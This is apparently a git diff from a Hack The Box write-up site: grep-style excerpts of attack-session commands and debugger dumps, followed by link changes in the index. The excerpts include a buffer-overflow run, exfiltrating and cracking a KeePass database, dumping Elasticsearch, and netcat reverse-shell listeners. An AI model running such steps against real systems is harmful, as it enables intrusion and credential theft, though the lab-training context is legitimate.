"aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaaga[...]" - Easy/35.html:$rip : 0x00000000004011ac → <****main+77> ret - Easy/35.html:$r12 : 0x0000000000401070 → <_start+0> xor ebp, ebp - Easy/35.html:$r13 : 0x00007fffffffe510 → 0x0000000000000001 - Easy/35.html: → python -c 'print "X"*128 + "Y"*8 + "Z"*8' - Easy/35.html: $rcx : 0x00007ffff7edc904 → 0x5477fffff0003d48 ("H="?) - Easy/35.html: $rdx : 0x00007ffff7fad580 → 0x0000000000000000 - Easy/35.html: $rsp : 0x00007fffffffe438 → "XXXXXXXXYYYYYYYYZZZZZZZZ" - Easy/35.html: $rsi : 0x00000000004052a0 → "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX[...]" - Easy/35.html: $rip : 0x00000000004011ac → <****main+77> ret - Easy/35.html: $r12 : 0x0000000000401070 → <_start+0> xor ebp, ebp - Easy/35.html: $r13 : 0x00007fffffffe510 → 0x0000000000000001 - Easy/35.html:→ nano exploit.py - Easy/35.html: $rsp : 0x00007fff98990520 → 0x0000000000000001 - Easy/35.html: $rip : 0x00007fd2a202e090 → <_start+0> mov rdi, rsp - Easy/35.html: 0x00007fff98990528│+0x0008: 0x00007fff98992748 → 0x00707061796d2f2e ("./myapp"?) - Easy/35.html: 0x00007fff98990538│+0x0018: 0x00007fff98992750 → "APPDIR=/tmp/.mount_tmtxDoJV" - Easy/35.html: 0x00007fff98990540│+0x0020: 0x00007fff9899276c → "APPIMAGE=/tmp/tm" - Easy/35.html: 0x00007fff98990548│+0x0028: 0x00007fff9899277d → "COLORTERM=truecolor" - Easy/35.html: 0x00007fff98990550│+0x0030: 0x00007fff98992791 → "DISPLAY=:0.0" - Easy/35.html: 0x00007fff98990558│+0x0038: 0x00007fff9899279e → "HOME=/root" - Easy/35.html: → 0x7fd2a202e090 <_start+0> mov rdi, rsp - Easy/35.html: [#0] 0x7fd2a202e090 → _start() - Easy/35.html: $rax : 0x000000000040115f → <****main+0> push rbp - Easy/35.html: $rcx : 0x00007fd2a2007718 → 0x00007fd2a2009a40 → 0x0000000000000000 - Easy/35.html: $rdx : 0x00007fff98990538 → 0x00007fff98992750 → "APPDIR=/tmp/.mount_tmtxDoJV" - Easy/35.html: $rsp : 0x00007fff98990440 → 0x00000000004011b0 → <__libc_csu_init+0> push r15 - Easy/35.html: $rbp : 0x00007fff98990440 → 0x00000000004011b0 → <__libc_csu_init+0> push r15 - Easy/35.html: $rsi : 0x00007fff98990528 → 0x00007fff98992748 → 0x00707061796d2f2e ("./myapp"?) - Easy/35.html: $rip : 0x0000000000401163 → <****main+4> sub rsp, 0x70 - Easy/35.html: $r8 : 0x00007fd2a2009a50 → 0x0000000000000004 - Easy/35.html: $r9 : 0x00007fd2a203c780 → <_dl_fini+0> push rbp - Easy/35.html: $r12 : 0x0000000000401070 → <_start+0> xor ebp, ebp - Easy/35.html: $r13 : 0x00007fff98990520 → 0x0000000000000001 - Easy/35.html: 0x00007fff98990440│+0x0000: 0x00000000004011b0 → <__libc_csu_init+0> push r15 ← $rsp, $rbp - Easy/35.html: 0x00007fff98990448│+0x0008: 0x00007fd2a1e74bbb → <__libc_start_main+235> mov edi, eax - Easy/35.html: 0x00007fff98990458│+0x0018: 0x00007fff98990528 → 0x00007fff98992748 → 0x00707061796d2f2e ("./myapp"?) - Easy/35.html: 0x00007fff98990468│+0x0028: 0x000000000040115f → <****main+0> push rbp - Easy/35.html: → 0x401163 <****main+4> sub rsp, 0x70 - Easy/35.html: [#0] 0x401163 → main() - Easy/35.html:→ 0x401163 <****main+4> sub rsp, 0x70 - Easy/35.html:→ objdump -D myapp | grep -i system - Easy/35.html: → objdump -D myapp | grep -i test - Easy/35.html: → nano exploit.py - Easy/35.html: → python3 exploit.py - Easy/35.html:→ ssh-keygen -f safe - Easy/35.html:→ chmod 600 safe - Easy/35.html:→ cat safe.pub - Easy/35.html: → scp -i ../Ghidra/safe user@10.10.10.147:MyPasswords.kdbx . - Easy/35.html: → scp -i ../Ghidra/safe user@10.10.10.147:IMG_0547.JPG . - Easy/35.html: → ls - Easy/35.html: → file MyPasswords.kdbx - Easy/35.html: → file IMG_0547.JPG - Easy/35.html:→ /usr/sbin/keepass2john MyPasswords.kdbx | sed "s/MyPasswords/IMG_0547.JPG/g" - Easy/35.html:→ /usr/sbin/keepass2john MyPasswords.kdbx | sed "s/MyPasswords/IMG_0547.JPG/g" > keepass_hash - Easy/35.html: → john -w:/usr/share/wordlists/rockyou.txt keepass_hash - Easy/5.html:**λ nihilist [nihilist/_HTB/Optimum] → nmap -sC -sV 10.10.10.8** - Easy/5.html: **λ root [nihilist/_HTB/Optimum] → nikto -h http://10.10.10.8/** - Easy/5.html: **λ root [nihilist/_HTB/Optimum] → searchsploit rejetto** - Easy/34.html: → nmap -F 10.10.10.115 - Easy/34.html: → nmap -sCV -p22,80 10.10.10.115 - Easy/34.html:→ echo "10.10.10.115 haystack.htb" >> /etc/hosts - Easy/34.html: → dirsearch -u http://10.10.10.115/ -t 50 -e txt,php,html,js - Easy/34.html:→ nikto -h http://haystack.htb/ - Easy/34.html: → curl -sk http://haystack.htb/robots.txt | grep nginx - Easy/34.html: → wget http://haystack.htb/needle.jpg - Easy/34.html: → exiftool needle.jpg - Easy/34.html: → strings needle.jpg - Easy/34.html: → echo "bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==" | base64 -d - Easy/34.html: → nmap -F 10.10.10.115 --top-ports 10000 -vvv - Easy/34.html: → nmap -sCV -p9200 10.10.10.115 - Easy/34.html: → curl -sk http://haystack.htb:9200 - Easy/34.html: → curl -sk http://haystack.htb:9200/_cat/indices/\?v - Easy/34.html:→ curl -X POST http://haystack.htb:9200/\/_search - Easy/34.html:→ curl -X POST http://haystack.htb:9200/bank/_search - Easy/34.html:→ npm install elasticdump -g - Easy/34.html:→ elasticdump --input=http://10.10.10.115:9200/quotes --output=quotes.json --type=data - Easy/34.html: → cat quotes.json| grep clave - Easy/34.html: → echo "cGFzczogc3BhbmlzaC5pcy5rZXk=" | base64 -d - Easy/34.html: → echo "dXNlcjogc2VjdXJpdHkg" | base64 -d - Easy/34.html: → ssh security@haystack.htb - Easy/34.html:→ nano nihilist.js - Easy/34.html:→ python -m SimpleHTTPServer 8080 - Easy/34.html:→ cat nihilist.js - Easy/34.html:→ nc -lvnp 9001 - Easy/34.html:→ nc -lvnp 9001 - Easy/34.html: → nc -lvnp 9002 - - -`** diff --git a/index.md b/index.md index bce3244..2b4ad96 100644 --- a/index.md +++ b/index.md @@ -10,78 +10,78 @@ ##### Hack The Box - Easy Boxes -[ Template Page ](Easy/0.html) +[ Template Page ](Easy/0.md) - 1. [ ✅ - Lame ](Easy/1.html) - 2. [ ✅ - Legacy ](Easy/2.html) - 3. [ ✅ - Devel ](Easy/3.html) - 4. [ ✅ - Beep ](Easy/4.html) - 5. [ ✅ - Optimum ](Easy/5.html) - 6. [ ✅ - Arctic ](Easy/6.html) - 7. [ ✅ - Grandpa ](Easy/7.html) - 8. [ ✅ - Granny ](Easy/8.html) - 9. [ ✅ - Bank ](Easy/9.html) - 10. [ ✅ - Blocky ](Easy/10.html) - 11. [ ✅ - Blue ](Easy/11.html) - 12. [ ✅ - Mirai ](Easy/12.html) - 13. [ ✅ - Shocker ](Easy/13.html) - 14. [ ✅ - Sense ](Easy/14.html) - 15. [ ✅ - Bashed ](Easy/15.html) - 16. [ ✅ - Nibbles ](Easy/16.html) - 17. [ ✅ - Valentine ](Easy/17.html) - 18. [ ✅ - Sunday](Easy/18.html) - 19. [ ✅ - Bounty](Easy/19.html) - 20. [ ✅ - Jerry ](Easy/20.html) - 21. [ ✅ - Active ](Easy/21.html) - 22. [ ✅ - Access ](Easy/22.html) - 23. [ ✅ - Frolic ](Easy/23.html) - 24. [ ✅ - Curling ](Easy/24.html) - 25. [ ✅ - Irked ](Easy/25.html) - 26. [ ✅ - Teacher ](Easy/26.html) - 27. [ ✅ - Help ](Easy/27.html) - 28. [ ✅ - FriendZone ](Easy/28.html) - 29. [ ✅ - Netmon ](Easy/29.html) - 30. [ ✅ - CasaDePapel ](Easy/30.html) - 31. [ ✅ - Bastion ](Easy/31.html) - 32. [ ✅ - SwagShop ](Easy/32.html) - 33. [ ✅ - Writeup ](Easy/33.html) - 34. [ ✅ - Haystack ](Easy/34.html) - 35. [ ✅ - Safe ](Easy/35.html) - 36. [ ✅ - Heist ](Easy/36.html) - 37. [ ✅ - Networked ](Easy/37.html) - 38. [ ✅ - Forest](Easy/38.html) - 39. [ ✅ - Postman](Easy/39.html) - 40. [ ✅ - Traverxec](Easy/40.html) - 41. [ ✅ - OpenAdmin](Easy/41.html) - 42. [ ✅ - Nest](Easy/42.html) - 43. [ ✅ - Traceback](Easy/43.html) - 44. [ ✅ - Remote](Easy/44.html) - 45. [ ✅ - Servmon](Easy/45.html) - 46. [ ✅ - Admirer](Easy/46.html) - 47. [ ✅ - Blunder](Easy/47.html) - 48. [ ✅ - Tabby](Easy/48.html) - 49. [ ✅ - Buff](Easy/49.html) - 50. [ ✅ - Omni](Easy/50.html) - 51. [ ✅ - Doctor](Easy/51.html) - 52. [ ✅ - Academy](Easy/52.html) - 53. [ ✅ - Laboratory](Easy/53.html) - 54. [ ✅ - Luanne](Easy/54.html) - 55. [ ✅ - Delivery](Easy/55.html) - 56. [ ✅ - Toolbox](Easy/56.html) - 57. [ ✅ - Sauna](Easy/57.html) - 58. [ ✅ - ScriptKiddie](Easy/58.html) - 59. [ ✅ - Armageddon](Easy/59.html) - 60. [ ✅ - Spectra](Easy/60.html) - 61. [ ✅ - Love](Easy/61.html) - 62. [ ✅ - Cap](Easy/62.html) - 63. [ ✅ - Knife](Easy/63.html) - 64. [ ✅ - Previse](Easy/64.html) - 65. [ ✅ - Paper](Easy/65.html) - 66. [ ✅ - BountyHunter](Easy/66.html) - 67. [ ✅ - Explore](Easy/67.html) - 68. [ ✅ - Horizontall](Easy/68.html) - 69. [ ✅ - Backdoor](Easy/69.html) - 70. [ ✅ - Driver](Easy/70.html) + 1. [ ✅ - Lame ](Easy/1.md) + 2. [ ✅ - Legacy ](Easy/2.md) + 3. [ ✅ - Devel ](Easy/3.md) + 4. [ ✅ - Beep ](Easy/4.md) + 5. [ ✅ - Optimum ](Easy/5.md) + 6. [ ✅ - Arctic ](Easy/6.md) + 7. [ ✅ - Grandpa ](Easy/7.md) + 8. [ ✅ - Granny ](Easy/8.md) + 9. [ ✅ - Bank ](Easy/9.md) + 10. [ ✅ - Blocky ](Easy/10.md) + 11. [ ✅ - Blue ](Easy/11.md) + 12. [ ✅ - Mirai ](Easy/12.md) + 13. [ ✅ - Shocker ](Easy/13.md) + 14. [ ✅ - Sense ](Easy/14.md) + 15. [ ✅ - Bashed ](Easy/15.md) + 16. [ ✅ - Nibbles ](Easy/16.md) + 17. [ ✅ - Valentine ](Easy/17.md) + 18. [ ✅ - Sunday](Easy/18.md) + 19. [ ✅ - Bounty](Easy/19.md) + 20. [ ✅ - Jerry ](Easy/20.md) + 21. [ ✅ - Active ](Easy/21.md) + 22. [ ✅ - Access ](Easy/22.md) + 23. [ ✅ - Frolic ](Easy/23.md) + 24. [ ✅ - Curling ](Easy/24.md) + 25. [ ✅ - Irked ](Easy/25.md) + 26. [ ✅ - Teacher ](Easy/26.md) + 27. [ ✅ - Help ](Easy/27.md) + 28. [ ✅ - FriendZone ](Easy/28.md) + 29. [ ✅ - Netmon ](Easy/29.md) + 30. [ ✅ - CasaDePapel ](Easy/30.md) + 31. [ ✅ - Bastion ](Easy/31.md) + 32. [ ✅ - SwagShop ](Easy/32.md) + 33. [ ✅ - Writeup ](Easy/33.md) + 34. [ ✅ - Haystack ](Easy/34.md) + 35. [ ✅ - Safe ](Easy/35.md) + 36. [ ✅ - Heist ](Easy/36.md) + 37. [ ✅ - Networked ](Easy/37.md) + 38. [ ✅ - Forest](Easy/38.md) + 39. [ ✅ - Postman](Easy/39.md) + 40. [ ✅ - Traverxec](Easy/40.md) + 41. [ ✅ - OpenAdmin](Easy/41.md) + 42. [ ✅ - Nest](Easy/42.md) + 43. [ ✅ - Traceback](Easy/43.md) + 44. [ ✅ - Remote](Easy/44.md) + 45. [ ✅ - Servmon](Easy/45.md) + 46. [ ✅ - Admirer](Easy/46.md) + 47. [ ✅ - Blunder](Easy/47.md) + 48. [ ✅ - Tabby](Easy/48.md) + 49. [ ✅ - Buff](Easy/49.md) + 50. [ ✅ - Omni](Easy/50.md) + 51. [ ✅ - Doctor](Easy/51.md) + 52. [ ✅ - Academy](Easy/52.md) + 53. [ ✅ - Laboratory](Easy/53.md) + 54. [ ✅ - Luanne](Easy/54.md) + 55. [ ✅ - Delivery](Easy/55.md) + 56. [ ✅ - Toolbox](Easy/56.md) + 57. [ ✅ - Sauna](Easy/57.md) + 58. [ ✅ - ScriptKiddie](Easy/58.md) + 59. [ ✅ - Armageddon](Easy/59.md) + 60. [ ✅ - Spectra](Easy/60.md) + 61. [ ✅ - Love](Easy/61.md) + 62. [ ✅ - Cap](Easy/62.md) + 63. [ ✅ - Knife](Easy/63.md) + 64. [ ✅ - Previse](Easy/64.md) + 65. [ ✅ - Paper](Easy/65.md) + 66. [ ✅ - BountyHunter](Easy/66.md) + 67. [ ✅ - Explore](Easy/67.md) + 68. [ ✅ - Horizontall](Easy/68.md) + 69. [ ✅ - Backdoor](Easy/69.md) + 70. [ ✅ - Driver](Easy/70.md) @@ -162,75 +162,75 @@ ##### Hack The Box - Medium Boxes -[Template Page](Medium/0.html) +[Template Page](Medium/0.md) - 1. [ ✅ - Popcorn](Medium/1.html) - 2. [ ✅ - Bastard](Medium/2.html) - 3. [ ✅ - Tenten](Medium/3.html) - 4. [ ✅ - Cronos](Medium/4.html) - 5. [ ✅ - October](Medium/5.html) - 6. [ ✅ - Lazy](Medium/6.html) - 7. [ ✅ - Sneaky](Medium/7.html) - 8. [ ✅ - Haircut](Medium/8.html) - 9. [ ✅ - Europa](Medium/9.html) - 10. [ ✅ - Nineveh](Medium/10.html) - 11. [ ✅ - Apocalyst](Medium/11.html) - 12. [ ✅ - SolidState](Medium/12.html) - 13. [ ✅ - Node](Medium/13.html) - 14. [ ✅ - Enterprise](Medium/14.html) - 15. [ ✅ - Jeeves](Medium/15.html) - 16. [ ✅ - Inception](Medium/16.html) - 17. [ ✅ - FluxCapacitor](Medium/17.html) - 18. [ ✅ - Chatterbox](Medium/18.html) - 19. [ ✅ - Aragog](Medium/19.html) - 20. [ ✅ - Bart](Medium/20.html) - 21. [ ✅ - Stratosphere](Medium/21.html) - 22. [ ✅ - Celestial](Medium/22.html) - 23. [ ✅ - Silo](Medium/23.html) - 24. [ ✅ - Poison](Medium/24.html) - 25. [ ✅ - Canape](Medium/25.html) - 26. [ ✅ - Olympus](Medium/26.html) - 27. [ ✅ - TartarSauce](Medium/27.html) - 28. [ ✅ - DevOops](Medium/28.html) - 29. [ ✅ - Hawk](Medium/29.html) - 30. [ ✅ - Waldo](Medium/30.html) - 31. [ ✅ - SecNotes](Medium/31.html) - 32. [ ✅ - Giddy](Medium/32.html) - 33. [ ✅ - Ypuffy](Medium/33.html) - 34. [ ✅ - Carrier](Medium/34.html) - 35. [ ✅ - Vault](Medium/35.html) - 36. [ ✅ - Redcross](Medium/36.html) - 37. [ ✅ - Lightweight](Medium/37.html) - 38. [ ✅ - Chaos](Medium/38.html) - 39. [ ✅ - Querier](Medium/39.html) - 40. [ ✅ - Arkham](Medium/40.html) - 41. [ ✅ - Unattended](Medium/41.html) - 42. [ ✅ - Luke](Medium/42.html) - 43. [ ✅ - Jarvis](Medium/43.html) - 44. [ ✅ - Craft](Medium/44.html) - 45. [ ✅ - Bitlab](Medium/45.html) - 46. [ ✅ - Wall](Medium/46.html) - 47. [ ✅ - Json](Medium/47.html) - 48. [ ✅ - AI](Medium/48.html) - 49. [ ✅ - Sniper ](Medium/49.html) - 50. [ ✅ - Mango ](Medium/50.html) - 51. [ ✅ - Obscurity](Medium/51.html) - 52. [ ✅ - Monteverde](Medium/52.html) - 53. [ ✅ - Book](Medium/53.html) - 54. [ ✅ - Cascade](Medium/54.html) - 55. [ ✅ - Magic](Medium/55.html) - 56. [ ✅ - Cache](Medium/56.html) - 57. [ ✅ - Fuse](Medium/57.html) - 58. [ ✅ - SneakyMailer](Medium/58.html) - 59. [ ✅ - OpenKeyS](Medium/59.html) - 60. [ ✅ - Worker](Medium/60.html) - 61. [ ✅ - Passage](Medium/61.html) - 62. [ ✅ - Jewel](Medium/62.html) - 63. [ ✅ - Bucket](Medium/63.html) - 64. [ ✅ - Time](Medium/64.html) - 65. [ ✅ - Ready](Medium/65.html) - 66. [ ✅ - Tenet](Medium/66.html) - 67. [ ✅ - Ophiuchi](Medium/67.html) + 1. [ ✅ - Popcorn](Medium/1.md) + 2. [ ✅ - Bastard](Medium/2.md) + 3. [ ✅ - Tenten](Medium/3.md) + 4. [ ✅ - Cronos](Medium/4.md) + 5. [ ✅ - October](Medium/5.md) + 6. [ ✅ - Lazy](Medium/6.md) + 7. [ ✅ - Sneaky](Medium/7.md) + 8. [ ✅ - Haircut](Medium/8.md) + 9. [ ✅ - Europa](Medium/9.md) + 10. [ ✅ - Nineveh](Medium/10.md) + 11. [ ✅ - Apocalyst](Medium/11.md) + 12. [ ✅ - SolidState](Medium/12.md) + 13. [ ✅ - Node](Medium/13.md) + 14. [ ✅ - Enterprise](Medium/14.md) + 15. [ ✅ - Jeeves](Medium/15.md) + 16. [ ✅ - Inception](Medium/16.md) + 17. [ ✅ - FluxCapacitor](Medium/17.md) + 18. [ ✅ - Chatterbox](Medium/18.md) + 19. [ ✅ - Aragog](Medium/19.md) + 20. [ ✅ - Bart](Medium/20.md) + 21. [ ✅ - Stratosphere](Medium/21.md) + 22. [ ✅ - Celestial](Medium/22.md) + 23. [ ✅ - Silo](Medium/23.md) + 24. [ ✅ - Poison](Medium/24.md) + 25. [ ✅ - Canape](Medium/25.md) + 26. [ ✅ - Olympus](Medium/26.md) + 27. [ ✅ - TartarSauce](Medium/27.md) + 28. [ ✅ - DevOops](Medium/28.md) + 29. [ ✅ - Hawk](Medium/29.md) + 30. [ ✅ - Waldo](Medium/30.md) + 31. [ ✅ - SecNotes](Medium/31.md) + 32. [ ✅ - Giddy](Medium/32.md) + 33. [ ✅ - Ypuffy](Medium/33.md) + 34. [ ✅ - Carrier](Medium/34.md) + 35. [ ✅ - Vault](Medium/35.md) + 36. [ ✅ - Redcross](Medium/36.md) + 37. [ ✅ - Lightweight](Medium/37.md) + 38. [ ✅ - Chaos](Medium/38.md) + 39. [ ✅ - Querier](Medium/39.md) + 40. [ ✅ - Arkham](Medium/40.md) + 41. [ ✅ - Unattended](Medium/41.md) + 42. [ ✅ - Luke](Medium/42.md) + 43. [ ✅ - Jarvis](Medium/43.md) + 44. [ ✅ - Craft](Medium/44.md) + 45. [ ✅ - Bitlab](Medium/45.md) + 46. [ ✅ - Wall](Medium/46.md) + 47. [ ✅ - Json](Medium/47.md) + 48. [ ✅ - AI](Medium/48.md) + 49. [ ✅ - Sniper ](Medium/49.md) + 50. [ ✅ - Mango ](Medium/50.md) + 51. [ ✅ - Obscurity](Medium/51.md) + 52. [ ✅ - Monteverde](Medium/52.md) + 53. [ ✅ - Book](Medium/53.md) + 54. [ ✅ - Cascade](Medium/54.md) + 55. [ ✅ - Magic](Medium/55.md) + 56. [ ✅ - Cache](Medium/56.md) + 57. [ ✅ - Fuse](Medium/57.md) + 58. [ ✅ - SneakyMailer](Medium/58.md) + 59. [ ✅ - OpenKeyS](Medium/59.md) + 60. [ ✅ - Worker](Medium/60.md) + 61. [ ✅ - Passage](Medium/61.md) + 62. [ ✅ - Jewel](Medium/62.md) + 63. [ ✅ - Bucket](Medium/63.md) + 64. [ ✅ - Time](Medium/64.md) + 65. [ ✅ - Ready](Medium/65.md) + 66. [ ✅ - Tenet](Medium/66.md) + 67. [ ✅ - Ophiuchi](Medium/67.md) @@ -282,7 +282,7 @@ * | Centreon, uncompyle, linpeas, GNU Screen 4.5.0 * | Json.Net deserialization, WS2012 R2 Datacenter * | Speech recognition SQL injection, jdwp - * | RFI, MS Compiled HTML Help + * | RFI, MS Compiled md Help * | MongoDB NoSQL injection, jjs * | Python exec(), file decryption, background processes * | Azure AD Connect exploit PoC @@ -308,18 +308,18 @@ ##### Hack The Box - Hard Boxes -[Template Page](Hard/0.html) +[Template Page](Hard/0.md) - 1. [ ✅ - Joker](Hard/1.html) - 2. [ ✅ - Calamity ](Hard/2.html) - 3. [ ✅ - Charon](Hard/3.html) - 4. [ ✅ - Shrek](Hard/4.html) - 5. [ ✅ - Mantis](Hard/5.html) - 6. [ ✅ - Kotarak](Hard/7.html) - 7. [ ✅ - Tally](Hard/6.html) - 8. [ ✅ - CrimeStoppers](Hard/8.html) - 9. [ ✅ - Falafel](Hard/9.html) - 10. [ ✅ - Dropzone](Hard/10.html) + 1. [ ✅ - Joker](Hard/1.md) + 2. [ ✅ - Calamity ](Hard/2.md) + 3. [ ✅ - Charon](Hard/3.md) + 4. [ ✅ - Shrek](Hard/4.md) + 5. [ ✅ - Mantis](Hard/5.md) + 6. [ ✅ - Kotarak](Hard/7.md) + 7. [ ✅ - Tally](Hard/6.md) + 8. [ ✅ - CrimeStoppers](Hard/8.md) + 9. [ ✅ - Falafel](Hard/9.md) + 10. [ ✅ - Dropzone](Hard/10.md) @@ -340,7 +340,7 @@ ##### Recurrent Tricks -[ Template Page ](Easy/0.html) +[ Template Page ](Easy/0.md) 1. [✅ - File transfers ](Tools/files/index.md) 2. [✅ - reverse shells with XC ](Tools/xc/index.md) @@ -357,7 +357,7 @@ ![](concept.png) -# [Binary Exploitation](binexp.html) +# [Binary Exploitation](binexp.md) ![](0.png)